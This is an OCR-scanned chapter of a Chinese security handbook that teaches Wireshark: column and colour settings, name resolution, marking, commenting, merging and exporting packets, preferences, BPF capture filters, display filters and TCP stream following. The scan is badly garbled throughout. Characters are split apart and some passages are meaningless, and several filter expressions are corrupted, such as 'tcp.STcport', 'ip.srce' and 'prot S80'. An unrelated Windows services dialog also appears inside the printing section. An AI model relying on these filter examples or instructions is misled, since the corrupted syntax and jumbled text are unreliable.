125 -+ 41. dtd Guangdon_ dB:ec:9.. 862.11 28 Control frame Acknowledgement, V Source 


MB Acknowledgement, 
v Destination 


用 i tn 隐藏 当前 列 ， pe V| Protocol 

pp pA ne 过 选择 相应 的 菜单 命令 ， 来 删除 或 隐藏 V 本 

列 ， 如 右 图 所 元 va ， 
删除 此 列 


ae 在 显示 列 标题 中 右 击 ， 在 弹出 的 快捷 菜单 中 选择 


“编辑 列 ” 菜 单 命令 ， 即 可 进入 列 信息 编辑 模式 ， 这 时 可 以 对 当前 列 信息 进行 修改 。 
标题 : Time 类 型 : Time (iormat as specified) = 字段 : |Enter a field .. 发 生 : © Cancel wOK | 
No. Time 7 Destination Protocol Length Type Info 
4. 修改 显示 时 间 [step 了 图 单 去 “捕获 ”菜单 ， 在 弹出 的 菜单 


本 二 机 的 和 “选项 ”菜单 命令 ， 如 下 图 


默认 情况 下 ，Wireshark 给 出 的 时 间 信 


息 不 方便 阅读 ， 为 此 ，Wireshark 提 供 了 多 “下 。 
种 时 间 显示 方式 ， 用 户 可 以 根据 个 人 喜好 DR- et 
es . 
单 去 “视图 ”菜单 ， 在 弹出 的 菜单 中 mi 
66 中 < 大 过 滤 妖 (F).. 
2 MT 人 刷新 接口 列表 F5 
在 打开 的 设置 界面 中 选择 “选项 ” 先 
时 间 显 示 格 式 四 ”项 卡 ， 如 下 图 所 示 。 从 这 里 勾 选 相应 的 选 
tl :| 项 解析 名 称 即 可 。 
缩放 (ZZ) ; 
输入 输出 选项 
这 样 就 可 以 将 默认 时 间 信 息 以 时 间 格 显示 选项 解析 名 称 
ry 出 来 。 下 图 为 修改 后 的 时 间 ， 这 样 了 实时 更 新 分 组 列表 。。 VMAC 地 址 解析 


解析 网 络 名 称 
解析 传输 层 名 称 


pa V 实时 捕获 时 自动 滚屏 
更 加 符合 阅 读 习 \ 贝 o 


Time 

2018-10-10 04:12:41.541339119 
2018-10-10 04:12:41.5439009096 
2018-10-10 04:12:41.560918794 
2018-10-10 04:12:41.578031296 


用 户 还 可 以 手动 修改 对 地 址 的 解析 ， 
se 
选择 “编辑 解析 的 名 称 ” 菜 单 命令 ， 


5. 名 字 解 析 


默认 情况 下 ，Wireshark 只 开启 了 MAC 
地 址 解析 ， 针 对 不 同 广 商 的 MAC 头 部 信息 
进行 解析， 以 方便 阅读 ， 如 果 在 实际 中 有 
需要 可 以 开启 解析 网 络 名 称 、 解 析 传 输 层 
名 称 。 有 具体 的 操作 步骤 如 下 : 
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图 所 示 。 


标记 /取消 标记 分 组 (M) 
忽略 /取消 忽略 分 组 (|) 
设置 /取消 设置 时 上 a8] 参考 
时 间 平 移 .… 

分 组 注释 . 

编辑 解析 的 名 称 


Wireshark 会 给 出 地 址 解析 库存 放 的 位 
置 ， 然 后 单 击 “统计 ”菜单 项 ， 在 弹出 的 
菜单 中 选择 “已 解析 的 地 址 ”菜单 命令 ， 
如 下 图 所 示 。 
捕获 文件 属性 
已 解析 的 地 址 
协议 分 级 (P) 
对 话 

分 组 长 度 

1/O 图 表 (|) 


[step 图 打开 下 图 所 示 的 对 话 框 ， 里 面 存 放 
了 已 经 解析 的 地 址 信息 。 通 过 对 名 称 的 解 
析 ， 对 于 数据 包 的 来 源 去 处 会 更 加 清晰 明 
了 ， 所 以 名 称 解 析 是 一 个 非常 好 的 功能 。 


Wireshark . 解析 后 的 地 址 . /tmp/wireshark_any_20181010054212_7Ln58a.pcapng @ 


Ctrl+Alt+Shift+C 


# 在 /tmpywireshark_any_29181916954212_7Ln58a.pcapng 中 找到 的 解析 后 的 地 址 -= 
# 注释 

# No entries. 

# Hosts 

# 167 entries. 


220.181.111.188 www.a.shifen.com 
1.180.234.31 x2.Lcdn .qq -co 
118.188.31.42 pi. tcdn. qg .Com 

1 


显示 > Scancel | | vOK | 


(全 注意 : 如 果 开 启 名 称 解析 可 能 会 对 性 
能 带 来 损耗 ， 同 时 地 址 解析 不 能 保证 全 
部 正确 ， 如 果 数 据 流 比较 大 建议 不 开启 名 
称 解析 ， 在 对 抓 取 的 数据 包 处 理 时 再 进行 
解析 。 


7.2.2 ”数据 包 操 作 


数据 包 操 作 是 Wireshark 的 主要 功能 ， 
获取 数据 包 后 ， 用 户 可 以 对 数据 包 进 行 标 
记 、 注 释 、 合 并 、 打 印 以 及 导出 等 操作 。 

1. 标记 数据 包 

标记 数据 包 可 以 实现 对 比较 重要 的 数 
据 包 进行 标记 ， 同 时 还 可 以 修改 数据 包 显 
示 颜 色 。 标 记 数 据 包 的 操作 步骤 如 下 : 
在 需要 进行 标记 的 数据 包 上 ， 右 击 ， 
在 弹出 的 菜单 中 选择 “标记 /取消 标记 分 
组 ”菜单 命令 ， 如 下 图 所 示 。 


第 7 章 无 线 网 络 的 安全 分 析 工 具 和 


标记 /取消 标记 分 组 (M) 
忽略 /取消 忽略 分 组 (|) 
设置 /取消 设置 时 间 参 考 
时 间 平 移 .… 

分 组 注释 .. 


[step 图 标记 后 的 数据 包 会 进行 高 亮 显 示 ， 变 
成 黑 底 白字 以 同 其 他 数据 包 进 行 区 别 ， 如 
下 图 所 示 o 


_ 
’ 


INo. Time01 Source address Destination > Protocol 
16.，2018-1D-16 86;19;31,946537324 et 108 ,68 ,46 .184 TCP 
16.，、2018-16-16 66:19:31.947899918 BG:Be: :606:6.. 16B.68.46.184 TCP 


16.，、2918-16-16 95:19:36.979799916 1e: a:68:01:2- rp ppp 892 .11 


16, 2016- 10-18 Q6; 19:31， 1 t ee 
| 民 A n . O22 38 i 


iL -二 - 和 862 .11 


6.… 2618- 19-16 95:19:32. 641825742 G4: ee:07:34:6 Tr 862.11 
L_ 7 2618-16-16 66:;19:65.9B5179579 14:7d:24:;26;8,.,, 32;10:;40:;b9:;a2:;83 892.11 


2. 修改 颜色 


为 了 区 分 不 同 的 数据 包 ，Wireshark 提 
供 了 对 数据 包 进 行 区 分 颜色 的 设置 ， 具 体 
操作 步骤 如 下 : 
step 加 在 数据 包 上 右 击 ， 在 弹出 的 快捷 菜单 
中 选择 “对 话 着 色 ” 菜 单 命令 ， 如 下 图 所 
示 ， 即 可 完成 对 数据 包 着 色 的 操作 ， 这 个 
操作 只 针对 此 次 抓 包 有 效 。 
作为 过 滤器 应 用 
准备 过 滤器 
对 话 过 滤器 
对 话 着 色 
step 加 如 果 想 要 给 数据 包 添 加 永久 性 的 着 色 
效果 ， 用 户 可 以 单 击 “视图 ”菜单 ， 在 弹 
出 的 菜单 列表 中 选择 “着 色 规 则 ”菜单 命 
令 ， 如 下 图 所 示 。 
三 着 色 分 组 列表 


着 色 规 则 (C).. 
对 话 着 色 


打开 下 图 所 示 的 对 话 框 ， 在 其 中 修改 


数据 包 的 颜色 ， 从 这 
会 永久 保存 。 


里 修改 的 颜色 规则 将 


Wireshark . Coloring Rules Defautt xj 


< 


v) SMB smb || nbss || nbns || nbipx || ipxsap || netbios 
v HTTP http || tcp.port == 80 || http2 
4 


观 汕 轧 媚 。 奖 盘 帮 动 。 趣 出 蕉 般 序 进行 你 理 ， 羡 列 埠 到 一 个 区 友 的 . 
中 || 一 || 中 


加 Help Export... Import... © Cancel | wOK | 
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ee 黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


侈 提示 : 默认 情况 下 ，Wireshark 提 供 的 颜 


色 规 则 可 以 满足 用 户 的 需求 ， 如 果 不 是 特 


殊 需 要 不 建议 永久 修改 数据 包 的 颜色 。 


3. 修改 列表 项 颜色 


具体 的 操作 步骤 如 下 : 
双击 需要 修改 的 列表 项 ， 下 方 会 出 
现 “前 景 ”和 “背景 ”两 个 按钮 ， 如 下 图 
所 示 。 

ge 


名 

四 

四 

图 HSRP Stats 
器 

四 

虹 


v SMB 
v HTTP 
4 


smb || nbss || nbns || nbipx || ipxsap || netbios 
http || tcp.port == 80 || http2 
双 古 所 独 。 苞 入 区 被 。 规 则 艾 自 房 进 行 旭 理 ， 直 到 挫 列 一 个 匹配 航 . 


+ 一 中 Apply as filter 


圆 Help Export... Import— © Cancel | vOK | 


单 击 “前 景 ” 或 “背景 ”按钮 ， 会 弹 
出 “选择 颜色 ”对 话 框 ，Wireshark 提 供 了 
丰富 的 颜色 。 当 然 如 果 有 需要 还 可 以 自 定 
义 颜 和 色 ， 如 下 图 所 示 。 


4. 添加 注释 


Wireshark 提 供 对 数据 包 注 释 的 功能 ， 
在 实际 操作 中 如 果 感 觉 这 个 数据 包 有 问题 
或 者 比较 重要 ， 可 以 添加 一 段 注释 信息 ， 
具体 操作 步骤 如 下 : 
右 击 需要 添加 注释 信息 的 数据 包 ， 在 
弹出 的 快捷 菜单 中 选择 “分 组 注释 ”菜单 
命令 ， 如 下 图 所 示 。 


标记 /取消 标记 分 组 (M) 
忽略 /取消 忽略 分 组 (|) 
设置 /取消 设置 时 间 参 考 
时 间 平 移 .. 

分 组 注释 ... 


Lie 


这 时 会 弹出 下 图 所 示 的 对 话 框 ， 在 其 
中 输入 相应 的 注释 。 添 加 注释 信息 后 下 方 
的 解读 列表 也 会 出 现 这 段 注释 信息 ， 以 方 
便 用 户 查 看 。 


Wireshark .Packet 5 Comment ©@ 


园 Help © Cancel v OK 


5. 合并 数据 包 


在 实际 抓 包 过 程 中 ， 如 果 网 络 流量 比 
较 大 ， 不 停止 抓 包 操作 ， 可 能 会 出 现 抓 包 
工具 消耗 掉 所 有 内 存 ， 最 终 导致 系统 崩溃 
的 状态 。 为 解决 这 个 问题 ， 用 户 可 以 采取 
分 段 抓 取 ， 生 成 多 个 数据 包 文件 ， 最 后 为 
了 整体 分 析 ， 再 将 这 些 分 段 数据 包 合并 成 
一 个 包 。 合 并 数据 包 的 操作 步骤 如 下 : 
选择 “文件 ”菜单 项 ， 在 弹出 的 菜 
单列 表 中 选择 “合并 ”菜单 命令 ， 如 下 图 
所 示 。 


打开 CtrltrO 
打开 最 近 

合并 (M)... 

从 Hex 转 储 导入 (1)... 

关闭 Ctrlt+W 


打开 “合并 捕获 文件 ”对 话 框 ， 在 其 
中 选择 需要 合并 的 文件 ， 即 可 完成 合并 数 
据 包 的 操作 ， 如 下 图 所 示 。 


Wireshark .合并 捕获 文件 个 
查看 : | /root/Downloads ”| 中 中 全 入 3 | 三 
刻 计算 机 名 称 ~ 大 小 类 型 
pe root 和 mount-shared-folders.sh 291 字 节 sh File 


# restart-vm-tools.sh 
WS tcp.pcapng 


130 字 节 sh File 
1.02 MiB pcap...File 
上 


文人 名 称 N :| | 


@ Cancel 
文件 类 起 : All Files 加 Hep 
前 道 分 组 
。 按时 间 ] 稚 合并 
追加 分 组 
读 取 过 滤器 : Apply aread filter ... 


6. 打印 数据 包 


Wireshark 提 供 了 数据 包 打 印 功 能 ， 可 
以 将 比较 重要 的 数据 包 进 行 打印 。 打 印 数 
据 包 的 操作 步骤 如 下 : 
选择 “文件 ”菜单 项 ， 在 弹出 的 菜 
单列 表 中 选择 “打印 ”菜单 命令 ， 如 下 图 
所 示 。 


导出 SSL 会 话 密 钥 .. 

导出 对 象 

打印 (P). Ctrl+P 
退出 Ctrl+Q 


弹出 “打印 ”对 话 框 ， 在 该 对 话 框 中 
会 显示 此 次 打印 数据 包 的 一 些 信 息 ， 包 括 
缩 略图 、 概 要 等 ， 如 下 图 所 示 。 

常规 《登录 ”恢复 。 依存 关系 


某 些 服务 依 床 于 其 他 服务 、 系 统 驱 动 程序 或 加 载 上 序 组 。 如 时 其 个 系统 组 件 被 停 
止 或 运行 不 正常 ， 依 问 于 它 的 服务 会 受到 影响 。 


Remote Procedure Call (RPC) 


此 服务 依 藉以 下 竺 统 组 件 (T); 
-6 DCOM Server Process Launcher 
9 RPC Endpoint Mapper 


以 下 系统 组 件 依 融 此 服务 (月 |; 

# Ee ActiveX Installer (AxlnstSV) 人 
-Application ldentity 

起 Application Information 

起 AppX Deployment Service (AppXSVO) 

6 Background Intelligent Transfer Service 


和 村 -…- 财 …-| 


i Background Tasks Infrastructure Service 
和 Base Filtering Engine v 


[we | ws 


7. 导出 数据 包 


Wireshark 提 供 了 数据 包 导 出 功能 ， 用 
户 可 以 进行 筛选 导出 ， 还 可 以 通过 分 类 导 
出 ， 还 可 以 只 导出 选中 数据 包 。 导 出 数据 
包 的 操作 步骤 如 下 : 
[seep 回 选择 “文件 ”菜单 项 ， 在 弹出 的 菜单 
列表 中 选择 “导出 特定 分 组 ”菜单 命令 ， 
如 下 图 所 示 。 
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导出 特定 分 组 ... 

导出 分 组 解析 结果 ， 
导出 分 组 字 节 流 (B).. Ctrl+Shift+X 
导出 PDU 到 文件 .. 

导出 SSL 会 话 密 钥 .. 

导出 对 象 


弹出 “导出 特定 分 组 ”对 话 框 ， 在 其 
中 可 以 选择 导出 数据 包 的 名 字 ， 并 设置 性 
出 范围 是 所 有 分 组 还 是 仅 选 中 分 组 ， 如 下 
图 所 示 。 


Wireshark. 导出 特定 分 组 Be 
查看 : | /root/Downloads ”| 中 史 个 和 福 汪 | 三 
国 计算 机 名 称 ”大 小 类 型 日 期 被 修 
国 "oot “~ tcp.pcapng 1.02 MiB pcap..File 2018/1. | 
| | 口 ， 
文件 名 称 (N) : | 
S Cancel 
导出 为 : Wiresharkj... - pcapng "| BHelp 
分 组 范围 用 gzip 压缩 (Z| 
已 捕获 '® 已 显示 
。) 所 有 分 组 (A) 33 二 5 
仅 选 中 分 组 (S) | 
范围 LIR): 0 


如 果 选 择 “ 导 出 分 组 解析 结果 ”菜单 
命令 ， 可 以 将 数据 包 导 出 不 同 的 格式 ， 如 
下 图 所 示 。 如 可 以 是 使 用 Excel 查 看 的 CSV 
格式 、 使 用 记事 本 查看 的 纯 文 本 格式 ， 还 
可 以 将 数据 包 导 出 为 C 语 言 数 组 、XML 数 
据 、JSON 数 据 等 格式 。 


为 纯 文 本 (T)... 
为 CSV.. 
为 上 语言 数组 ... 


为 PSML XML... 
为 PDML XML.. 
为 JSON.. 


7.2.3 ”首选 项 设置 


大 多 数 软 件 都 会 提供 一 个 首选 项 设 并 


置 ， 该 设置 主要 用 于 配制 软件 的 整体 风 
格 ，Wireshark 也 提供 了 首选 项 设置 。 进 行 
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首选 项 设置 的 操作 步骤 如 下 : 

[step 回 选择 “编辑 ”菜单 项 ， 在 弹出 的 菜单 
列表 中 选择 “首选 项 ”菜单 命令 ， 如 下 图 
所 示 。 


分 组 注释 ... Ctrl+Alt+C 
Delete All Packet Comments 

配置 文件 .… Ctrl+Shift+A 
首选 项 (P)... Ctrl+Shift+P 


打开 “首选 项 ”对 话 框 ， 如 下 图 所 
示 。 首 次 打开 “首选 项 ”对 话 框 后 ， 在 默 
认 打 开 的 界面 中 ， 用 户 可 以 进行 相关 选项 
的 设置 。 

Wireshark . 首选 项 @ 


Co 
Font and Colors ”打开 文件 夹 中 的 文件 
ee 人 最 近 便 用 的 文件 夹 


Expert 该 文件 灾 : 浏览 .. 
Filter Buttons 
Name Resolution | 显示 最 多 
» Protocols 10 “过 淖 器 项 目 
» Statistics 
Advanced 10 ”个 最 近 文 件 
Y 确认 未 保存 的 捕获 文件 
主 工具 栏 样式 : 只 有 图 标 
语言 : 使 用 如 统 设 置 ~ 
回 Hetp ©S Cancel | voK | 


“首选 项 ”对 话 框 中 相关 参数 的 介绍 
如 下 : 

e “ 记 住 主 窗口 的 大 小 及 位 置 ” 复 选 
框 : 选中 之 后 ， 每 次 打开 都 将 是 固 
定 大 小 。 

e “打开 文件 夹 中 的 文件 ”: 设置 默 
认 打开 或 保存 文件 的 路 径 ， 如 果 经 
常 抓 取 数 据 包 ， 建 议 设置 一 个 固定 
的 位 置 。 

e “显示 最 多 ”: 显示 数据 包 条 目 ， 
根据 实际 需要 进行 设置 即 可 。 

e “确认 未 保存 的 捕获 文件 ” 复 选 
框 : 选中 之 后 ， 没 有 保存 的 文件 名 
前 面 会 多 出 一 个 “*” 号 ， 提 示 用 户 
没有 保存 ， 一 般 建议 开局 。 

e “ 主 工 具 栏 的 样式 ”: 这 里 有 三 种 样 
式 供 选择 ， 即 只 有 图 标 、 只 有 文本 、 
图 标 加 文本 ， 根 据 需要 选择 即 可 。 


“语言 ”: 设置 语言 环境 ， 这 里 可 
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以 选择 多 种 国家 语言 ， 如 果 英 文 较 
好 可 以 切换 成 英文 状态 。 

sp 国 在 “首选 项 ”对 话 框 中 ， 选 择 

Columns 项 ， 然 后 单 击 左下 方 的 “+” 按 钮 

可 以 添加 一 个 列 ， 单 击 “-” 按 钮 可 以 删除 

一 个 列 ， 如 下 图 所 示 。 


已 显示 标题 类 型 字段 字段 发 生 
v TimeDl Time (format as specified) 
vv Sourceaddress Custom WwWlan.sa 0 
v Destination Destination address 
V Protocol Protocol 
v Length Packet length (bytes) 
v Info Information 


= 


选择 Font and Colors 项 ， 在 打开 界面 
中 可 以 设置 软件 字体 大 小 以 及 默认 颜色 ， 
如 下 图 所 示 。 


主 窗 口 字 人 钵 : Liberation Mono 11.0 

Lazy badgers move unique waxy jellyfish packets 0123456789 
颜色 : 

| 有 标记 的 分 组 
国 国 | | 忽略 的 分 组 


国生 | | “追踪 数据 流 "客户 端 示例 文本 
国 国 | “追踪 数据 流 "服务 器 示例 文本 


有 过 汪 仙 
8 
sampewaningflter 
选择 Layout 项 ， 在 打开 的 界面 中 可 
以 设置 软件 显示 布局 ， 该 项 还 是 比较 重要 
的 ， 上 默认 情况 下 ， 软 件 选 择 的 是 分 3 横 显 
示 ， 根 据 个 人 喜 好 可 以 选择 不 同 的 布局 方 
式 进 和 行 显示 ， 如 下 图 所 示 。 


时 本 

窗 格 1: 痢 格 2: 窗 格 2: 

。 分 组 列表 分 组 列表 分 组 列表 
分 组 详情 e 分 组 详情 分 组 详情 
分 组 字 节 流 分 组 子 书 流 9 分 组 子 书 流 
无 3 无 

Packet List settings: 

Show packet Separator 
状态 栏 设置 : 
Show selected packet number 
显示 文件 加 载 时 间 
Restore Defaults 


7.2.4 捕获 选项 
捕获 选项 主要 针对 抓 取 数据 包 使 用 的 


网 卡 、 抓 包 前 的 过 滤 、 抓 包 大 小 、 抓 包 时 
长 等 进行 设置 。 这 个 功能 在 抓 包 软件 中 也 
属于 非常 重要 的 一 个 设置 。 

1. 进行 捕获 选项 设置 

进行 捕获 选项 设置 的 操作 步骤 如 下 : 
选择 “捕获 ”菜单 项 ， 在 弹出 的 菜 


单列 表 中 选择 “选项 ”菜单 命令 ， 如 下 图 
所 示 。 


加 选项 (0).. Ctrl+K 
着 开始 (S) Ctrl+E 
转 

捕获 过 滤器 (F)... 

刷新 接口 列表 F5 


打开 “捕获 接口 ”对 话 框 ， 默 认 选 中 

“输入 ”选项 卡 ， 其 中 混杂 模式 为 选中 状 
态 ， 该 项 需要 选中 否则 可 能 抓 取 不 到 数据 
包 ， 列 表 中 列 出 网 卡 相关 人 信息， 选择 相应 
的 网 卡 可 以 抓 取 数据 包 ， 如 下 图 所 示 。 


Wireshark .捕获 接口 © 


流量 Snap 

eth0 默 记 
eny i 
wlan | 

flog Linux netfilterlog messages 里 认 
nfqueu Raw IPV 野 认 
usbmoni 一 Unknown 是 议 

。 ee Unknown 是 认 
Cisco rerm pture: ciscodump Unknown 
Ran teor randpkt 一 = nknown 

SH ul 


Unknown 
Unknown 


4 
v| 在 所 有 按 口 上 便 岂 涪 杂 模式 
所 选择 接口 的 捕 孜 过 滤器 ; | 由 | Enter a capture filter 


加 Help xclose || 开始 | 


在 “捕获 接口 ”对 话 框 中 ， 选 择 “ 输 
出 ”选项 卡 ， 在 其 中 可 以 设置 文件 保存 的 
路 径 、 输 出 格式 、 是 否 自 动 创建 新 文件 
等 ， 如 下 图 所 示 。 


捕获 到 永久 文件 


文件 ，001 浏 虹 , 


输出 格式 : 9 pcapng Pcap 
Y 自动 创建 新 文件 ， 经 过 . 
7 净 字 节 > 
1 -| | 秒 


使 用 一 个 环形 缓冲 器 , 采用 |2 = | 文件 


默认 “ 目 动 创建 新 文件 ” 复 选 框 未 被 
选中 ， 选 中 后 可 以 指定 保存 规则 ， 有 3 种 规 
则 可 供 选 择 。 
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可 以 调整 。 he 
(2) 根据 时 间 长 度 判 断 ， 达 到 规定 时 

间 保 存 更 换 下 一 个 文件 。 例 如 ， 每 间隔 1 
分 钟 存 储 一 个 文件 。 

(3) 循环 模式 ， 只 是 用 两 个 数据 包 ， 

初始 时 会 创建 两 个 数据 包 ， 当 需要 第 三 
数据 包 时 不 创建 而 蔡 换 第 一 个 数据 包 ， 
依次 循环 。 
在 “捕获 接口 ”对 话 框 中 ， 选 择 “ 选 
项 ”选项 卡 ， 在 其 中 可 以 设置 显示 选项 、 
解析 名 称 、 自 动 停止 捕获 等 参数 ， 如 下 图 
所 示 。 

显示 选项 解析 名 称 
V| 实时 更 新 分 组 列表 
v 实时 捕获 时 自动 滚屏 


vv MAC 地 址 解析 
解析 网 络 名 称 
解析 传输 层 名 称 


自动 停止 捕获 ， 在 经 过 .. 


1 - 分 组 
1 -| 文件 
1 秒 


( 侈 提示 : 这 里 的 自动 停止 捕获 规则 ， 相 当 
于 一 个 定时 器 的 作用 ， 当 符合 条 件 后 停止 
抓 包 ， 可 以 同 多 文件 保存 功能 配合 使 用 。 
例如 : 设置 每 1MB 保 存 一 个 数据 包 ， 符 合 
10 个 文件 后 停止 抓 包 。 


2. 数据 包 的 过 滤 设 置 


Wireshark 抓 包 过 滤 是 基于 libpcapy/ 
Winpcap 库 实现 的 ， 所 以 遵循 BPF (Berke- 
ley Packet Filter) 语法 ， 其 中 包括 类 型 

(Type) 、 方 回 (CDir) 、 协 议 (Proto) 、 
逻辑 运算 符 。 

e@ 类 型 : host、net、port。 

e@ 方 同 : src、dst。 

e 协议 : ether、ip、tcp、udp、http、 

ftp 等 。 
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e 逻辑 运算 符 ，&& 与 、|| 或 、! 非 。 

例如 : 想 要 抓 取 源 地 址 位 192.168.0.100 
目的 地 端口 为 80 的 流量 ， 过 滤 语 句 为 : 
(src host 192.168.0.100 && dst port 
80) ; 想 要 抓 取 IP 地 址 192.168.0.100 和 和 
192.168.0.101 的 流量 ， 过 滤 语 句 为 : (host 
192.168.0.100 || host 192.168.0.101) ; 想 
要 抓 取 除 广播 外 的 所 有 包 ， 过 滤 语 句 为 : 


(! broadcast) 。 


3. 开始 捕获 数据 包 


(1) 过 滤 MAC 地 址 。 过 滤 的 语法 格 
式 为 : 
ether host < 需要 过 滤 的 MAC 地 址 > 


ether src host <MRAC 地 址 > 
ether dst host <MAC 地 址 > 


例如 : 对 MAC 地 址 过 滤 ， 可 以 在 “所 
选择 接口 的 捕获 过 滤器 ”文本 框 中 输入 如 
下 图 所 示 的 语句 。 


Vv| 在 所 有 接口 上 使 用 混杂 模式 
所 这 拉 扩 口 的 所 次 过 过 器 EersreTa30I330073 


仿 提 示 : 如 果 过 滤 字 段 输 入 错误 ， 则 背景 
色 是 红色 ， 输 入 正确 则 是 绿色 。 
(2) 过 滤 全 地 址 。 过 滤 的 语法 格式 为 : 
host < 需 过 滤 的 IP 地 址 > 


src host <IP 地 址 > 
dst host <IP 地 址 > 


例如 : 对 IP 地 址 过 滤 ， 可 以 在 “所 选 
择 接 口 的 捕获 过 滤器 ”文本 框 中 输入 下 图 
所 示 的 语句 。 


yj 在 所 有 接口 上 使 用 混杂 楼 式 
所 选择 接口 的 摘 获 过 滤器 : 由 src host192.168.0.100| 四 


(3) 过 滤 端 口 。 过 小 的 语法 格式 为 : 


prot S80 1 prot 83830、 dst port 980 sre 
port 80 


过 滤 协 议 为 : arp、icmp、http。 

例如 : 综合 过 滤 地 址 与 端口 ， 可 以 在 
“所 选择 接口 的 捕获 过 滤器 ”文本 框 中 输 
入 下 图 所 示 的 语句 。 
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vV| 在 所 有 接口 上 使 用 混杂 楼 式 
所 选择 接口 的 捕获 过 滤器 : | 由 | host 192.168.0.100 && port 8080 


全 提示 : 抓 包 过 滤 一 旦 设置 后 将 只 抓 取 符 
合 规则 的 数据 包 ， 这 样 会 过 滤 掉 大 量 干 扰 
数据 包 ， 从 而 提高 抓 包 数 据 的 准确 率 。 


4. 过 滤 数 据 包 


显示 过 滤器 与 抓 包 过 小 类 似 ， 显 示 过 
滤器 是 在 已 经 抓 取 的 数据 包 中 过 滤 ， 显 示 
出 需要 的 数据 包 ， 在 快捷 方式 的 下 方 有 一 
个 可 以 输入 表达 式 的 地 方 ， 如 下 图 所 示 。 
在 这 里 输入 相应 的 表达 式 即 可 过 滤 。 


着 加 © 几 局 eeew 癌 加 aa 昂 | 
NApply a splay Niller ~ <Cirt-/> 


显示 过 滤 的 语法 设置 规则 如 下 : 

e 比较 操作 符 : == 等 于 、! = 不 等 
于 、。 > 大于、 < 小 于 、>= 大 于 等 于 、 
<= 小 于 等 于 。 

e 逻辑 操作 : and 与 操作 、or 或 操作 、 
xor 异 或 操作 、not 非 操作 。 

e IP 地址 : ip.addr、ip.src、ip.dst。 

e 过 滤 端 口 : tcp.port、 tcp.srcport、 
tcp.dstport、 tcp.flat.syn、 tcp.flag. 


ack。 
e 过 滤 协 议 : arp、ip、icmp、upd、 
tcp、bootp、dns 等 。 
例如 : 想 要 过 滤 满 足以 下 条 件 的 数据 
其 中 ，IP 地 址 如 下 设置 : 
ip.addr == 192.168.1.1 
ip.src — 192.168.1.1 
1ip.dst == 192.168.1.1 
ip.srce == 192.168.1.100 and ip.dst 一 
58.106.127.80 
端口 如 下 设置 : 
tcp.port = 80 


号 


tcp.STcport == 80 
tcp.dstport == 80 
tcp.flag.syn == 1 
过 滤 协 议 如 下 : 


ap EeeDpx noOE DEEP no arp 


下 面 给 出 一 个 综合 过 滤 的 语句 ， 其 中 
第 选 了 IP 地 址 为 192.0.2.1 并 且 不 是 从 tcp 协 
议 80、25 端 口 发 出 的 包 。 下 图 为 输入 的 表 
I 

厦 国 

由 |ip.addr == 


问题 : 什么 情况 使 用 抓 包 过 滤 ? 什么 
情况 使 用 显示 过 滤 ? 

如 果实 际 网 络 数据 流量 比较 大 ， 并 
且 已 经 锁定 数据 包 类 型 可 以 使 用 抓 包 过 波 

。 一 般 如 果 没 有 特殊 需求 建议 使 用 整体 
抓 包 ， 然 后 再 进行 显示 过 滤 ， 保 证 一 个 真 
实 的 网 络 环境 ， 根 据 需要 再 进行 得分 ， 这 
样 分 析 数 据 包 效果 会 更 好 。 


局 级 操作 


高 级 操作 是 将 捕获 的 数据 包 以 更 直观 
的 形式 展现 出 来 ， 学 会 如 何 使 用 这 些 高 级 
技能 ， 对 于 以 后 的 数据 包 处 理会 更 加 得 心 
应 手 。 


© Oa* 


192.0.2.1 and not tcp.port in {80 25 


Fed 


7.3.1 分 析 数 据 包 
分 析 数 据 包 主 要 包括 数据 追踪 与 专家 


信息 两 方面 内 容 ， 它 们 都 属于 “分 析 ” 羔 
单 下 的 功能 。 


1. 数据 追 踩 


正常 通信 中 如 TCP、UDP、SSL 等 数 
据 包 都 是 以 分 片 的 形 发 送 的 ， 如 果 在 整个 
数据 包 中 分 片 查 看 数据 包 不 便于 分 析 ， 使 
用 数据 流 追 踪 可 以 将 TCP、UDP、SSL 等 
数据 流 进 行 重 组 ， 以 一 个 完整 的 形式 呈现 
出 来 。 

打开 追踪 流 有 两 种 方式 : 

第 1 种 方式 : 在 数据 流 显 示 列 表 中 ， 选 
择 需 要 追踪 的 数据 流 ， 右 击 ， 在 弹出 的 快 
捷 菜 单 中 选择 “追踪 流 ” 菜 单 命 令 ， 如 下 
图 所 示 。 


第 7 章 ， 无 线 网 络 的 安全 分 析 工 具 一 


SCTP 
追踪 流 
复制 | 


第 2 种 方式 : 选择 “分 析 ” 沫 单 ， 在 
弹出 的 染 单 列表 中 选择 “ 奶 踩 流 ” 沫 单 命 
令 ， 如 下 图 所 示 。 


重新 载 入 Lua 插件 
SCTP 
追踪 流 


以 上 两 种 方式 都 可 以 打开 “追踪 流 ” 界 
面 ， 如 下 图 所 示 。 从 这 里 可 以 清晰 地 看 到 这 
个 协议 通信 的 完整 过 程 ， 其 中 发 送 请 求 会 以 


显示 ， 服 务 器 返回 结果 会 显示 为 监 色 
红色 显示 ， 后 未 会 耿 不 
Wireshark , 追踪 TCP 流 (tcp.stream eq 0). tcp.pcapng ©@Q@o0 

GET /success ,txXt ode 1 3 
Host: es 1.firef 

User-Agen Ue Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/v26166161 Firefox/60.0 
Accept : 

Accept -Lar < age Nn;0F0.5 

Accept -Enc ee ng: 2 ip ‘ge flate 

Cache-Contr 

Pragma: no-c 

Connection: ep-alive 

HTTP/1.1 299 OK 

Content-Type: text/pl 

Content-Length : 相 

Last Mo dified: May 2617 18:64:48 GMT 

ETag 780505f48bt e1444eb?d28986123" 

AcCC anges 

Server; Mnazon 

X-AMz -Cf- Id: lu QuIDoga eit neg OHZxXShTNPt1M8vqKqSA4aAASsA== 

Cache-Control: validate 

Date: Thu, 11 Dct 2B18 81: 43; 24 GHT 

全 ct keep-alive 

SUCCess 

GET /SuccCess.tx HTTP/1.1 

Host: ri tportal.firefox 

USer-Agent: Moz 1 V5 .9 ee Linux x86 64; rv:690.9}) Gecko/29196191 Firefox/69.90 有 7 
2 柯 户 映 分 如 2 版 务 疾 分 柏 3tuml 引 

Entire conversation (1,344 bytes) 显示 和 保存 数据 为 ASCII ” lo 上 D 
下 找 : 

四 Hetp 滤 挤 此 流 打印 Save as.. 


2. 专家 信息 

专家 信息 可 以 对 数据 包 中 特定 状态 
进行 警告 说 明 ， 其 中 包括 错误 信息 (er- 
rors) 、 和 警告 信息 (warnings) 、 注 意 信息 
(notes) 以 及 对 话 信 息 (chats) 。 查 看 专 
easing poppet 
选择 “分 析 ” 菜 单项 ， ee 
pe 
图 所 示 。 


SCTP 
追踪 流 


专家 信息 
打开 “专家 信息 ”对 话 框 ， 如 下 图 所 
